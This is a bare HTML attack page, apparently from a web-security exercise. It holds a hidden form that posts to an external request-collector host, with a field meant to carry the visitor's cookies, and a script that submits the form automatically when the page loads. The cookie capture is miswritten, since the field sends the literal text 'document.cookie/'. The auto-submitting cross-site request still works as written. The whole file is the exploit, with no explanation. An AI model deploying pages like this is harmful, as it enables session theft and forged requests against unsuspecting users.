<!DOCTYPE html>
<html lang="fr">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title></title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
    </head>
    <body>
        <header>
        </header>
        <main>
            <form id="my_form" method='POST' action='https://enq9462g8ejl.x.pipedream.net'>
              <input type='hidden' name='account' value=document.cookie/>
            </form>
            <script>document.getElementById("my_form").submit();</script>
        </main>
        <footer>
        </footer>
    </body>
</html>
